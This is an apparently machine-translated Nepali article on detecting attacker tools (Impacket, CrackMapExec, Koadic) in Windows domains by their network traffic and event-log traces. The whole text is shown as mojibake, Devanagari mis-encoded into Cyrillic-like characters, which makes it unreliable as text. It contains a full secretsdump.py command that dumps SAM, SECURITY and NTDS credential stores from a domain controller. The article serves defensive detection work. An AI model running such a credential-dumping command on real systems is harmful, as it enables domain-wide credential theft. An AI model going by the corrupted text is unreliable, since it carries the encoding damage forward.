рд╡рд┐рдиреНрдбреЛрдЬ рдкреВрд░реНрд╡рд╛рдзрд╛рд░рдорд╛ рдЖрдХреНрд░рдордгрд╣рд░реВ рдХрд╕рд░реА рдкрддреНрддрд╛ рд▓рдЧрд╛рдЙрдиреЗ: рд╣реНрдпрд╛рдХрд░ рдЙрдкрдХрд░рдгрд╣рд░реВ рдЕрдзреНрдпрдпрди рдЧрд░реНрджреИ

рд╡рд┐рдиреНрдбреЛрдЬ рдкреВрд░реНрд╡рд╛рдзрд╛рд░рдорд╛ рдЖрдХреНрд░рдордгрд╣рд░реВ рдХрд╕рд░реА рдкрддреНрддрд╛ рд▓рдЧрд╛рдЙрдиреЗ: рд╣реНрдпрд╛рдХрд░ рдЙрдкрдХрд░рдгрд╣рд░реВ рдЕрдзреНрдпрдпрди рдЧрд░реНрджреИ

рдХрд░реНрдкреЛрд░реЗрдЯ рдХреНрд╖реЗрддреНрд░ рдорд╛ рдЖрдХреНрд░рдордг рдХреЛ рд╕рдВрдЦреНрдпрд╛ рд╣рд░реЗрдХ рд╡рд░реНрд╖ рдмрдвреНрджреИ рдЫ: рдЙрджрд╛рд╣рд░рдг рдХреЛ рд▓рд╛рдЧреА 2017 рдорд╛, 13% рдердк рдЕрджреНрд╡рд┐рддреАрдп рдШрдЯрдирд╛рд╣рд░реВ рд░реЗрдХрд░реНрдб рдЧрд░рд┐рдПрдХреЛ рдерд┐рдпреЛ 2016 рдорд╛ рднрдиреНрджрд╛, рд░ 2018 рдХреЛ рдЕрдиреНрддреНрдпрдорд╛ - 27% рдердк рдШрдЯрдирд╛рд╣рд░реВрдЕрдШрд┐рд▓реНрд▓реЛ рдЕрд╡рдзрд┐рдХреЛ рддреБрд▓рдирд╛рдорд╛ред рддреА рд╕рд╣рд┐рдд рдЬрд╣рд╛рдБ рдореБрдЦреНрдп рдХрд╛рдо рдЧрд░реНрдиреЗ рдЙрдкрдХрд░рдг рд╡рд┐рдиреНрдбреЛрдЬ рдЕрдкрд░реЗрдЯрд┐рдЩ рд╕рд┐рд╕реНрдЯрдо рд╣реЛред 2017-2018 рдорд╛, APT Dragonfly, APT28, рдПрдкреАрдЯреА рдордбреНрдбреАрд╡рд╛рдЯрд░ рдпреБрд░реЛрдк, рдЙрддреНрддрд░ рдЕрдореЗрд░рд┐рдХрд╛ рд░ рд╕рд╛рдЙрджреА рдЕрд░реЗрдмрд┐рдпрд╛рдорд╛ рд╕рд░рдХрд╛рд░реА рд░ рд╕реИрдиреНрдп рд╕рдВрдЧрдардирд╣рд░реВрдорд╛ рдЖрдХреНрд░рдордгрд╣рд░реВ рдЧрд░рд┐рдпреЛред рд░ рд╣рд╛рдореАрд▓реЗ рдпрд╕рдХреЛ рд▓рд╛рдЧрд┐ рддреАрдирд╡рдЯрд╛ рдЙрдкрдХрд░рдгрд╣рд░реВ рдкреНрд░рдпреЛрдЧ рдЧрд░реНрдпреМрдВ - рдЗрдореНрдкреНрдпрд╛рдХреЗрдЯ, CrackMapExec ╨╕ рдХреЛрдЖрдбрд┐рдХред рддрд┐рдиреАрд╣рд░реВрдХреЛ рд╕реНрд░реЛрдд рдХреЛрдб рдЦреБрд▓рд╛ рдЫ рд░ GitHub рдорд╛ рдЙрдкрд▓рдмреНрдз рдЫред

рдпреЛ рдзреНрдпрд╛рди рджрд┐рди рд▓рд╛рдпрдХ рдЫ рдХрд┐ рдпреА рдЙрдкрдХрд░рдгрд╣рд░реВ рдкреНрд░рд╛рд░рдореНрднрд┐рдХ рдкреНрд░рд╡реЗрд╢рдХреЛ рд▓рд╛рдЧрд┐ рдкреНрд░рдпреЛрдЧ рдЧрд░реНрджреИрдирдиреН, рддрд░ рдкреВрд░реНрд╡рд╛рдзрд╛рд░ рднрд┐рддреНрд░ рдЖрдХреНрд░рдордгрдХреЛ рд╡рд┐рдХрд╛рд╕ рдЧрд░реНрдиред рдЖрдХреНрд░рдордгрдХрд╛рд░реАрд╣рд░реВрд▓реЗ рдкрд░рд┐рдзрд┐рдХреЛ рдкреНрд░рд╡реЗрд╢ рдкрдЫрд┐ рдЖрдХреНрд░рдордгрдХреЛ рд╡рд┐рднрд┐рдиреНрди рдЪрд░рдгрд╣рд░реВрдорд╛ рддрд┐рдиреАрд╣рд░реВрд▓рд╛рдИ рдкреНрд░рдпреЛрдЧ рдЧрд░реНрдЫрдиреНред рдпреЛ, рд╡реИрд╕реЗ, рдкрддреНрддрд╛ рд▓рдЧрд╛рдЙрди рдЧрд╛рд╣реНрд░реЛ рдЫ рд░ рдЕрдХреНрд╕рд░ рдорд╛рддреНрд░ рдкреНрд░рд╡рд┐рдзрд┐ рдХреЛ рдорджреНрджрдд рд╕рдВрдЧ рдиреЗрдЯрд╡рд░реНрдХ рдЯреНрд░рд╛рдлрд┐рдХрдорд╛ рд╕рдореНрдЭреМрддрд╛рдХреЛ рдЯреНрд░реЗрд╕рд╣рд░реВ рдкрд╣рд┐рдЪрд╛рди рдЧрд░реНрджреИ рд╡рд╛ рдЕрдиреБрдорддрд┐ рджрд┐рдиреЗ рдЙрдкрдХрд░рдгрд╣рд░реВ рдкреВрд░реНрд╡рд╛рдзрд╛рд░рдорд╛ рдкреНрд░рд╡реЗрд╢ рдЧрд░реЗрдкрдЫрд┐ рдЖрдХреНрд░рдордгрдХрд╛рд░реАрдХреЛ рд╕рдХреНрд░рд┐рдп рдХрд╛рд░реНрдпрд╣рд░реВ рдкрддреНрддрд╛ рд▓рдЧрд╛рдЙрдиреБрд╣реЛрд╕реНред рдЙрдкрдХрд░рдгрд╣рд░реВрд▓реЗ рд╡рд┐рднрд┐рдиреНрди рдкреНрд░рдХрд╛рд░рдХрд╛ рдкреНрд░рдХрд╛рд░реНрдпрд╣рд░реВ рдкреНрд░рджрд╛рди рдЧрд░реНрджрдЫ, рдлрд╛рдЗрд▓рд╣рд░реВ рд╕реНрдерд╛рдирд╛рдиреНрддрд░рдгрджреЗрдЦрд┐ рд░рдЬрд┐рд╕реНрдЯреНрд░реАрд╕рдБрдЧ рдЕрдиреНрддрд░рдХреНрд░рд┐рдпрд╛ рдЧрд░реНрди рд░ рд░рд┐рдореЛрдЯ рдореЗрд╕рд┐рдирдорд╛ рдЖрджреЗрд╢рд╣рд░реВ рдХрд╛рд░реНрдпрд╛рдиреНрд╡рдпрди рдЧрд░реНрдиред рд╣рд╛рдореАрд▓реЗ рддрд┐рдиреАрд╣рд░реВрдХреЛ рдиреЗрдЯрд╡рд░реНрдХ рдЧрддрд┐рд╡рд┐рдзрд┐ рдирд┐рд░реНрдзрд╛рд░рдг рдЧрд░реНрди рдпреА рдЙрдкрдХрд░рдгрд╣рд░реВрдХреЛ рдЕрдзреНрдпрдпрди рд╕рдЮреНрдЪрд╛рд▓рди рдЧрд░реНрдпреМрдВред

рд╣рд╛рдореАрд▓реЗ рдХреЗ рдЧрд░реНрди рдЖрд╡рд╢реНрдпрдХ рдерд┐рдпреЛ:

  • рд╣реНрдпрд╛рдХрд┐рдЩ рдЙрдкрдХрд░рдгрд▓реЗ рдХрд╕рд░реА рдХрд╛рдо рдЧрд░реНрдЫ рднрдиреНрдиреЗ рдмреБрдЭреНрдиреБрд╣реЛрд╕реНред рдкрддреНрддрд╛ рд▓рдЧрд╛рдЙрдиреБрд╣реЛрд╕реН рдХрд┐ рдЖрдХреНрд░рдордгрдХрд╛рд░реАрд╣рд░реВрд▓реЗ рд╢реЛрд╖рдг рдЧрд░реНрди рдЖрд╡рд╢реНрдпрдХ рдЫ рд░ рддрд┐рдиреАрд╣рд░реВрд▓реЗ рдкреНрд░рдпреЛрдЧ рдЧрд░реНрди рд╕рдХреНрдиреЗ рдкреНрд░рд╡рд┐рдзрд┐рд╣рд░реВред
  • рдЖрдХреНрд░рдордгрдХреЛ рдкрд╣рд┐рд▓реЛ рдЪрд░рдгрдорд╛ рд╕реВрдЪрдирд╛ рд╕реБрд░рдХреНрд╖рд╛ рдЙрдкрдХрд░рдгрд╣рд░реВрджреНрд╡рд╛рд░рд╛ рдкрддреНрддрд╛ рдирд▓рд╛рдЧреЗрдХреЛ рдХреБрд░рд╛ рдкрддреНрддрд╛ рд▓рдЧрд╛рдЙрдиреБрд╣реЛрд╕реНред рдпрд╛ рдд рдЖрдХреНрд░рдордгрдХрд╛рд░реА рдЖрдиреНрддрд░рд┐рдХ рдЖрдХреНрд░рдордгрдХрд╛рд░реА рднрдПрдХреЛ рдХрд╛рд░рдгрд▓реЗ рд╡рд╛ рдЖрдХреНрд░рдордгрдХрд╛рд░реАрд▓реЗ рдкреВрд░реНрд╡рд╛рдзрд╛рд░рдорд╛ рднрдПрдХреЛ рдкреНрд╡рд╛рд▓рдХреЛ рд╢реЛрд╖рдг рдЧрд░рд┐рд░рд╣реЗрдХреЛ рд╣реБрдирд╕рдХреНрдЫ рдЬреБрди рдкрд╣рд┐рд▓реЗ рдерд╛рд╣рд╛ рдерд┐рдПрдиред рдпреЛ рдЖрдлреНрдиреЛ рдХрд╛рд░реНрдпрдХреЛ рд╕рдореНрдкреВрд░реНрдг рд╢реНрд░реГрдВрдЦрд▓рд╛ рдкреБрдирд░реНрд╕реНрдерд╛рдкрд┐рдд рдЧрд░реНрди рд╕рдореНрднрд╡ рд╣реБрдиреНрдЫ, рддреНрдпрд╕реИрд▓реЗ рдердк рдЖрдиреНрджреЛрд▓рди рдкрддреНрддрд╛ рд▓рдЧрд╛рдЙрдиреЗ рдЗрдЪреНрдЫрд╛ред
  • рдШреБрд╕рдкреИрда рдкрддреНрддрд╛ рд▓рдЧрд╛рдЙрдиреЗ рдЙрдкрдХрд░рдгрд╣рд░реВрдмрд╛рдЯ рдЭреВрдЯрд╛ рд╕рдХрд╛рд░рд╛рддреНрдордХрд╣рд░реВ рд╣рдЯрд╛рдЙрдиреБрд╣реЛрд╕реНред рд╣рд╛рдореАрд▓реЗ рдмрд┐рд░реНрд╕рдиреБ рд╣реБрдБрджреИрди рдХрд┐ рдЬрдм рдХреЗрд╣рд┐ рдХрд╛рд░реНрдпрд╣рд░реВ рдорд╛рддреНрд░ рдЯреЛрд╣реАрдХреЛ рдЖрдзрд╛рд░рдорд╛ рдкрддреНрддрд╛ рд▓рдЧрд╛рдЗрдиреНрдЫ, рдмрд╛рд░рдореНрдмрд╛рд░ рддреНрд░реБрдЯрд┐рд╣рд░реВ рд╕рдореНрднрд╡ рдЫрдиреНред рд╕рд╛рдорд╛рдиреНрдпрддрдпрд╛ рдкреВрд░реНрд╡рд╛рдзрд╛рд░рдорд╛ рддреНрдпрд╣рд╛рдБ рдкрд░реНрдпрд╛рдкреНрдд рд╕рдВрдЦреНрдпрд╛рдорд╛ рддрд░рд┐рдХрд╛рд╣рд░реВ рдЫрдиреН, рдХреБрдиреИ рдкрдирд┐ рдЬрд╛рдирдХрд╛рд░реА рдкреНрд░рд╛рдкреНрдд рдЧрд░реНрдирдХреЛ рд▓рд╛рдЧрд┐, рдкрд╣рд┐рд▓реЛ рдирдЬрд░рдорд╛ рд╡реИрдз рд╡реНрдпрдХреНрддрд┐рд╣рд░реВрдмрд╛рдЯ рдЕрд▓рдЧ рдЧрд░реНрди рд╕рдХрд┐рдБрджреИрдиред

рдпреА рдЙрдкрдХрд░рдгрд╣рд░реВрд▓реЗ рдЖрдХреНрд░рдордгрдХрд╛рд░реАрд╣рд░реВрд▓рд╛рдИ рдХреЗ рджрд┐рдиреНрдЫ? рдпрджрд┐ рдпреЛ рдЗрдореНрдкреНрдпрд╛рдХреЗрдЯ рд╣реЛ рднрдиреЗ, рддрдм рдЖрдХреНрд░рдордгрдХрд╛рд░реАрд╣рд░реВрд▓реЗ рдкрд░рд┐рдзрд┐ рддреЛрдбреЗрд░ рдкрдЫреНрдпрд╛рдЙрдиреЗ рдЖрдХреНрд░рдордгрдХреЛ рд╡рд┐рднрд┐рдиреНрди рдЪрд░рдгрд╣рд░реВрдорд╛ рдкреНрд░рдпреЛрдЧ рдЧрд░реНрди рд╕рдХрд┐рдиреЗ рдореЛрдбреНрдпреБрд▓рд╣рд░реВрдХреЛ рдареВрд▓реЛ рдкреБрд╕реНрддрдХрд╛рд▓рдп рдкреНрд░рд╛рдкреНрдд рдЧрд░реНрдЫрдиреНред рдзреЗрд░реИ рдЙрдкрдХрд░рдгрд╣рд░реВрд▓реЗ рдЗрдореНрдкреНрдпрд╛рдХреЗрдЯ рдореЛрдбреНрдпреБрд▓рд╣рд░реВ рдЖрдиреНрддрд░рд┐рдХ рд░реВрдкрдорд╛ рдкреНрд░рдпреЛрдЧ рдЧрд░реНрдЫрдиреН - рдЙрджрд╛рд╣рд░рдгрдХрд╛ рд▓рд╛рдЧрд┐, рдореЗрдЯрд╛рд╕реНрдкреНрд▓реЛрдЗрдЯред рдпрд╕рдорд╛ рд░рд┐рдореЛрдЯ рдХрдорд╛рдгреНрдб рдХрд╛рд░реНрдпрд╛рдиреНрд╡рдпрдирдХреЛ рд▓рд╛рдЧрд┐ dcomexec рд░ wmiexec рдЫ, Impacket рдмрд╛рдЯ рдердкрд┐рдПрдХреЛ рдореЗрдореЛрд░реАрдмрд╛рдЯ рдЦрд╛рддрд╛рд╣рд░реВ рдкреНрд░рд╛рдкреНрдд рдЧрд░реНрдирдХреЛ рд▓рд╛рдЧрд┐ secretsdumpред рдирддрд┐рдЬрд╛рдХреЛ рд░реВрдкрдорд╛, рдпрд╕реНрддреЛ рдкреБрд╕реНрддрдХрд╛рд▓рдпрдХреЛ рдЧрддрд┐рд╡рд┐рдзрд┐рдХреЛ рд╕рд╣реА рдкрд╣рд┐рдЪрд╛рдирд▓реЗ рдбреЗрд░рд┐рднреЗрдЯрд┐рднрд╣рд░реВ рдкрддреНрддрд╛ рд▓рдЧрд╛рдЙрдиреЗ рд╕реБрдирд┐рд╢реНрдЪрд┐рдд рдЧрд░реНрдиреЗрдЫред

рдпреЛ рдХреБрдиреИ рд╕рдВрдпреЛрдЧ рд╣реЛрдЗрди рдХрд┐ рд╕рд┐рд░реНрдЬрдирд╛рдХрд░реНрддрд╛рд╣рд░реВрд▓реЗ CrackMapExec (рд╡рд╛ рдХреЗрд╡рд▓ CME) рдХреЛ рдмрд╛рд░реЗрдорд╛ "Impacket рджреНрд╡рд╛рд░рд╛ рд╕рдВрдЪрд╛рд▓рд┐рдд" рд▓реЗрдЦреЗред рдердк рд░реВрдкрдорд╛, CME рд╕рдБрдЧ рд▓реЛрдХрдкреНрд░рд┐рдп рдкрд░рд┐рджреГрд╢реНрдпрд╣рд░реВрдХреЛ рд▓рд╛рдЧрд┐ рддрдпрд╛рд░-рдирд┐рд░реНрдорд┐рдд рдХрд╛рд░реНрдпрдХреНрд╖рдорддрд╛ рдЫ: рдкрд╛рд╕рд╡рд░реНрдбрд╣рд░реВ рд╡рд╛ рддрд┐рдиреАрд╣рд░реВрдХреЛ рд╣реНрдпрд╛рд╕рд╣рд░реВ рдкреНрд░рд╛рдкреНрдд рдЧрд░реНрди Mimikatz, рд░рд┐рдореЛрдЯ рдХрд╛рд░реНрдпрд╛рдиреНрд╡рдпрдирдХреЛ рд▓рд╛рдЧрд┐ Meterpreter рд╡рд╛ рд╕рд╛рдореНрд░рд╛рдЬреНрдп рдПрдЬреЗрдиреНрдЯрдХреЛ рдХрд╛рд░реНрдпрд╛рдиреНрд╡рдпрди, рд░ рдмреЛрд░реНрдбрдорд╛ рдмреНрд▓рдбрд╣рд╛рдЙрдиреНрдбред

рд╣рд╛рдореАрд▓реЗ рд░реЛрдЬреЗрдХреЛ рддреЗрд╕реНрд░реЛ рдЙрдкрдХрд░рдг рдХреЛрдЖрдбрд┐рдХ рдерд┐рдпреЛред рдпреЛ рдПрдХрджрдо рднрд░реНрдЦрд░рдХреЛ рд╣реЛ, рдпреЛ 25 рдорд╛ рдЕрдиреНрддрд░реНрд░рд╛рд╖реНрдЯреНрд░рд┐рдп рд╣реНрдпрд╛рдХрд░ рд╕рдореНрдореЗрд▓рди DEFCON 2017 рдорд╛ рдкреНрд░рд╕реНрддреБрдд рдЧрд░рд┐рдПрдХреЛ рдерд┐рдпреЛ рд░ рдПрдХ рдЧреИрд░-рдорд╛рдирдХ рджреГрд╖реНрдЯрд┐рдХреЛрдг рджреНрд╡рд╛рд░рд╛ рдкреНрд░рддрд┐рд╖реНрдард┐рдд рдЫ: рдпрд╕рд▓реЗ HTTP, Java Script рд░ Microsoft Visual Basic Script (VBS) рдорд╛рд░реНрдлрдд рдХрд╛рдо рдЧрд░реНрджрдЫред рдпрд╕ рджреГрд╖реНрдЯрд┐рдХреЛрдгрд▓рд╛рдИ рд▓рд┐рдн рдЕрдл рд▓реНрдпрд╛рдгреНрдб рднрдирд┐рдиреНрдЫ: рдЙрдкрдХрд░рдгрд▓реЗ рд╡рд┐рдиреНрдбреЛрдЬрдорд╛ рдирд┐рд░реНрдорд┐рдд рдирд┐рд░реНрднрд░рддрд╛ рд░ рдкреБрд╕реНрддрдХрд╛рд▓рдпрд╣рд░реВрдХреЛ рд╕реЗрдЯ рдкреНрд░рдпреЛрдЧ рдЧрд░реНрджрдЫред рд╕рд┐рд░реНрдЬрдирд╛рдХрд░реНрддрд╛рд╣рд░реВрд▓реЗ рдпрд╕рд▓рд╛рдИ COM рдХрдорд╛рдгреНрдб рд░ рдХрдиреНрдЯреНрд░реЛрд▓, рд╡рд╛ C3 рднрдиреНрдЫрдиреНред

IMPACKET

рдЗрдореНрдкреНрдпрд╛рдХреЗрдЯрдХреЛ рдХрд╛рд░реНрдпрдХреНрд╖рдорддрд╛ рдзреЗрд░реИ рдлрд░рд╛рдХрд┐рд▓реЛ рдЫ, AD рднрд┐рддреНрд░рдХреЛ рд╣реЗрд░рд╡рд┐рдЪрд╛рд░ рд░ рдЖрдиреНрддрд░рд┐рдХ MS SQL рд╕рд░реНрднрд░рд╣рд░реВрдмрд╛рдЯ рдбреЗрдЯрд╛ рд╕рдЩреНрдХрд▓рди рдЧрд░реНрдиреЗ, рдкреНрд░рдорд╛рдгрд╣рд░реВ рдкреНрд░рд╛рдкреНрдд рдЧрд░реНрдиреЗ рдкреНрд░рд╡рд┐рдзрд┐рд╣рд░реВ рд╕рдореНрдо: рдпреЛ SMB рд░рд┐рд▓реЗ рдЖрдХреНрд░рдордг рд╣реЛ, рд░ рдбреЛрдореЗрди рдирд┐рдпрдиреНрддреНрд░рдХрдмрд╛рдЯ рдкреНрд░рдпреЛрдЧрдХрд░реНрддрд╛ рдкрд╛рд╕рд╡рд░реНрдбрд╣рд░реВрдХреЛ рд╣реНрдпрд╛рд╕рд╣рд░реВ рднрдПрдХреЛ ntds.dit рдлрд╛рдЗрд▓ рдкреНрд░рд╛рдкреНрдд рдЧрд░реНрдиреЗред рдЗрдореНрдкреНрдпрд╛рдХреЗрдЯрд▓реЗ рдЯрд╛рдвреИрдмрд╛рдЯ рдЪрд╛рд░ рдлрд░рдХ рд╡рд┐рдзрд┐рд╣рд░реВ рдкреНрд░рдпреЛрдЧ рдЧрд░реЗрд░ рдЖрджреЗрд╢рд╣рд░реВ рдХрд╛рд░реНрдпрд╛рдиреНрд╡рдпрди рдЧрд░реНрджрдЫ: WMI, рд╡рд┐рдиреНрдбреЛрдЬ рд╢реЗрдбреНрдпреБрд▓рд░ рд╡реНрдпрд╡рд╕реНрдерд╛рдкрди рд╕реЗрд╡рд╛, DCOM, рд░ SMB, рд░ рддреНрдпрд╕реЛ рдЧрд░реНрди рдкреНрд░рдорд╛рдгрд╣рд░реВ рдЖрд╡рд╢реНрдпрдХ рдкрд░реНрджрдЫред

рдЧреЛрдкреНрдп рдбрдореНрдк

рд╕рд┐рдХреНрд░реЗрдЯ рдбрдореНрдкрдорд╛ рдПрдХ рдирдЬрд░ рд░рд╛рдЦреМрдВред рдпреЛ рдПрдХ рдореЛрдбреНрдпреБрд▓ рд╣реЛ рдЬрд╕рд▓реЗ рдкреНрд░рдпреЛрдЧрдХрд░реНрддрд╛ рдореЗрд╕рд┐рди рд░ рдбреЛрдореЗрди рдирд┐рдпрдиреНрддреНрд░рдХ рджреБрд╡реИрд▓рд╛рдИ рд▓рдХреНрд╖рд┐рдд рдЧрд░реНрди рд╕рдХреНрдЫред рдпрд╕рд▓рд╛рдИ рдореЗрдореЛрд░реА рдХреНрд╖реЗрддреНрд░рд╣рд░реВ LSA, SAM, SECURITY, NTDS.dit рдХреЛ рдкреНрд░рддрд┐рд▓рд┐рдкрд┐рд╣рд░реВ рдкреНрд░рд╛рдкреНрдд рдЧрд░реНрди рдкреНрд░рдпреЛрдЧ рдЧрд░реНрди рд╕рдХрд┐рдиреНрдЫ, рддреНрдпрд╕реИрд▓реЗ рдпреЛ рдЖрдХреНрд░рдордгрдХреЛ рд╡рд┐рднрд┐рдиреНрди рдЪрд░рдгрд╣рд░реВрдорд╛ рджреЗрдЦреНрди рд╕рдХрд┐рдиреНрдЫред рдореЛрдбреНрдпреБрд▓рдХреЛ рд╕рдЮреНрдЪрд╛рд▓рдирдХреЛ рдкрд╣рд┐рд▓реЛ рдЪрд░рдг SMB рдорд╛рд░реНрдлрдд рдкреНрд░рдорд╛рдгреАрдХрд░рдг рд╣реЛ, рдЬрд╕рдорд╛ рдкреНрд░рдпреЛрдЧрдХрд░реНрддрд╛рдХреЛ рдкрд╛рд╕рд╡рд░реНрдб рд╡рд╛ рдпрд╕рдХреЛ рд╣реНрдпрд╛рд╕рд▓рд╛рдИ рд╕реНрд╡рдЪрд╛рд▓рд┐рдд рд░реВрдкрдорд╛ рдкрд╛рд╕ рдж рд╣реНрдпрд╛рд╕ рдЖрдХреНрд░рдордг рдЧрд░реНрди рдЖрд╡рд╢реНрдпрдХ рдкрд░реНрджрдЫред рддреНрдпрд╕рдкрдЫрд┐ рд╕реЗрд╡рд╛ рдирд┐рдпрдиреНрддреНрд░рдг рдкреНрд░рдмрдиреНрдзрдХ (SCM) рдорд╛ рдкрд╣реБрдБрдЪ рдЦреЛрд▓реНрди рд░ winreg рдкреНрд░реЛрдЯреЛрдХрд▓ рдорд╛рд░реНрдлрдд рд░рдЬрд┐рд╕реНрдЯреНрд░реАрдорд╛ рдкрд╣реБрдБрдЪ рдкреНрд░рд╛рдкреНрдд рдЧрд░реНрди рдЕрдиреБрд░реЛрдз рдЖрдЙрдБрдЫ, рдЬрд╕рдХреЛ рдкреНрд░рдпреЛрдЧ рдЧрд░реЗрд░ рдЖрдХреНрд░рдордгрдХрд╛рд░реАрд▓реЗ рдЪрд╛рд╕реЛрдХрд╛ рд╢рд╛рдЦрд╛рд╣рд░реВрдХреЛ рдбреЗрдЯрд╛ рдкрддреНрддрд╛ рд▓рдЧрд╛рдЙрди рд░ SMB рдорд╛рд░реНрдлрдд рдкрд░рд┐рдгрд╛рдорд╣рд░реВ рдкреНрд░рд╛рдкреНрдд рдЧрд░реНрди рд╕рдХреНрдЫред

рдЪрд┐рддреНрд░рдорд╛ред 1 рд╣рд╛рдореА рджреЗрдЦреНрдЫреМрдВ рдХрд┐ рдХрд╕рд░реА рд╡рд╛рд╕реНрддрд╡рдорд╛ winreg рдкреНрд░реЛрдЯреЛрдХрд▓ рдкреНрд░рдпреЛрдЧ рдЧрд░реНрджрд╛, LSA рд╕рдБрдЧ рд░рдЬрд┐рд╕реНрдЯреНрд░реА рдХреБрдЮреНрдЬреА рдкреНрд░рдпреЛрдЧ рдЧрд░реЗрд░ рдкрд╣реБрдБрдЪ рдкреНрд░рд╛рдкреНрдд рдЧрд░рд┐рдиреНрдЫред рдпреЛ рдЧрд░реНрдирдХрд╛ рд▓рд╛рдЧрд┐, opcode 15 - OpenKey рд╕рдБрдЧ DCERPC рдЖрджреЗрд╢ рдкреНрд░рдпреЛрдЧ рдЧрд░реНрдиреБрд╣реЛрд╕реНред

рд╡рд┐рдиреНрдбреЛрдЬ рдкреВрд░реНрд╡рд╛рдзрд╛рд░рдорд╛ рдЖрдХреНрд░рдордгрд╣рд░реВ рдХрд╕рд░реА рдкрддреНрддрд╛ рд▓рдЧрд╛рдЙрдиреЗ: рд╣реНрдпрд╛рдХрд░ рдЙрдкрдХрд░рдгрд╣рд░реВ рдЕрдзреНрдпрдпрди рдЧрд░реНрджреИ
рдЪрд╛рдорд▓ред 1. winreg рдкреНрд░реЛрдЯреЛрдХрд▓ рдкреНрд░рдпреЛрдЧ рдЧрд░реЗрд░ рд░рдЬрд┐рд╕реНрдЯреНрд░реА рдХреБрдЮреНрдЬреА рдЦреЛрд▓реНрджреИ

рдЕрд░реНрдХреЛ, рдЬрдм рдХреБрдЮреНрдЬреАрдорд╛ рдкрд╣реБрдБрдЪ рдкреНрд░рд╛рдкреНрдд рд╣реБрдиреНрдЫ, рдорд╛рдирд╣рд░реВ рд╕реЗрднрдХреА рдХрдорд╛рдгреНрдбрдХреЛ рд╕рд╛рде opcode 20 рдХреЛ рд╕рд╛рде рдмрдЪрдд рдЧрд░рд┐рдиреНрдЫред Impacket рд▓реЗ рдпреЛ рдзреЗрд░реИ рд╡рд┐рд╢рд┐рд╖реНрдЯ рддрд░рд┐рдХрд╛рдорд╛ рдЧрд░реНрдЫред рдпрд╕рд▓реЗ рдорд╛рдирд╣рд░реВрд▓рд╛рдИ рдлрд╛рдЗрд▓рдорд╛ рдмрдЪрдд рдЧрд░реНрдЫ рдЬрд╕рдХреЛ рдирд╛рдо .tmp рд╕рдБрдЧ рдЬреЛрдбрд┐рдПрдХреЛ 8 рдЕрдирд┐рдпрдорд┐рдд рд╡рд░реНрдгрд╣рд░реВрдХреЛ рд╕реНрдЯреНрд░рд┐рдЩ рд╣реЛред рдердк рд░реВрдкрдорд╛, рдпрд╕ рдлрд╛рдЗрд▓рдХреЛ рдердк рдЕрдкрд▓реЛрдб SMB рдорд╛рд░реНрдлрдд System32 рдбрд╛рдЗрд░реЗрдХреНрдЯрд░реАрдмрд╛рдЯ рд╣реБрдиреНрдЫ (рдЪрд┐рддреНрд░ 2)ред

рд╡рд┐рдиреНрдбреЛрдЬ рдкреВрд░реНрд╡рд╛рдзрд╛рд░рдорд╛ рдЖрдХреНрд░рдордгрд╣рд░реВ рдХрд╕рд░реА рдкрддреНрддрд╛ рд▓рдЧрд╛рдЙрдиреЗ: рд╣реНрдпрд╛рдХрд░ рдЙрдкрдХрд░рдгрд╣рд░реВ рдЕрдзреНрдпрдпрди рдЧрд░реНрджреИ
рдЪрд╛рдорд▓ред 2. рд░рд┐рдореЛрдЯ рдореЗрд╕рд┐рдирдмрд╛рдЯ рд░рдЬрд┐рд╕реНрдЯреНрд░реА рдХреБрдЮреНрдЬреА рдкреНрд░рд╛рдкреНрдд рдЧрд░реНрдиреЗ рдпреЛрдЬрдирд╛

рдпреЛ рдмрд╛рд╣рд┐рд░ рдЬрд╛рдиреНрдЫ рдХрд┐ рдиреЗрдЯрд╡рд░реНрдХрдорд╛ рдпрд╕реНрддреЛ рдЧрддрд┐рд╡рд┐рдзрд┐ winreg рдкреНрд░реЛрдЯреЛрдХрд▓, рд╡рд┐рд╢рд┐рд╖реНрдЯ рдирд╛рдо, рдЖрджреЗрд╢ рд░ рддрд┐рдиреАрд╣рд░реВрдХреЛ рдЕрд░реНрдбрд░ рдкреНрд░рдпреЛрдЧ рдЧрд░реЗрд░ рдирд┐рд╢реНрдЪрд┐рдд рд░рдЬрд┐рд╕реНрдЯреНрд░реА рд╢рд╛рдЦрд╛рд╣рд░реВрдорд╛ рдкреНрд░рд╢реНрдирд╣рд░реВ рджреНрд╡рд╛рд░рд╛ рдкрддреНрддрд╛ рд▓рдЧрд╛рдЙрди рд╕рдХрд┐рдиреНрдЫред

рдпреЛ рдореЛрдбреНрдпреБрд▓рд▓реЗ Windows рдШрдЯрдирд╛ рд▓рдЧрдорд╛ рдЯреНрд░реЗрд╕рд╣рд░реВ рдкрдирд┐ рдЫреЛрдбреНрдЫ, рдпрд╕рд▓рд╛рдИ рдкрддреНрддрд╛ рд▓рдЧрд╛рдЙрди рд╕рдЬрд┐рд▓реЛ рдмрдирд╛рдЙрдБрдЫред рдЙрджрд╛рд╣рд░рдг рдХреЛ рд▓рд╛рдЧреА, рдЖрджреЗрд╢ рдХрд╛рд░реНрдпрд╛рдиреНрд╡рдпрди рдХреЛ рдкрд░рд┐рдгрд╛рдо рдХреЛ рд░реВрдк рдорд╛

secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC

рд╡рд┐рдиреНрдбреЛрдЬ рд╕рд░реНрднрд░ 2016 рд▓рдЧрдорд╛ рд╣рд╛рдореА рдШрдЯрдирд╛рд╣рд░реВрдХреЛ рдирд┐рдореНрди рдХреБрдЮреНрдЬреА рдЕрдиреБрдХреНрд░рдо рджреЗрдЦреНрдиреЗрдЫреМрдВ:

1. 4624 - рд░рд┐рдореЛрдЯ рд▓рдЧрдЗрдиред
2. 5145 - winreg рд░рд┐рдореЛрдЯ рд╕реЗрд╡рд╛рдорд╛ рдкрд╣реБрдБрдЪ рдЕрдзрд┐рдХрд╛рд░ рдЬрд╛рдБрдЪ рдЧрд░реНрджреИред
3. 5145 - System32 рдбрд╛рдЗрд░реЗрдХреНрдЯрд░реАрдорд╛ рдлрд╛рдЗрд▓ рдкрд╣реБрдБрдЪ рдЕрдзрд┐рдХрд╛рд░рд╣рд░реВ рдЬрд╛рдБрдЪ рдЧрд░реНрджреИред рдлрд╛рдЗрд▓рдорд╛ рдорд╛рдерд┐ рдЙрд▓реНрд▓реЗрдЦрд┐рдд рдЕрдирд┐рдпрдорд┐рдд рдирд╛рдо рдЫред
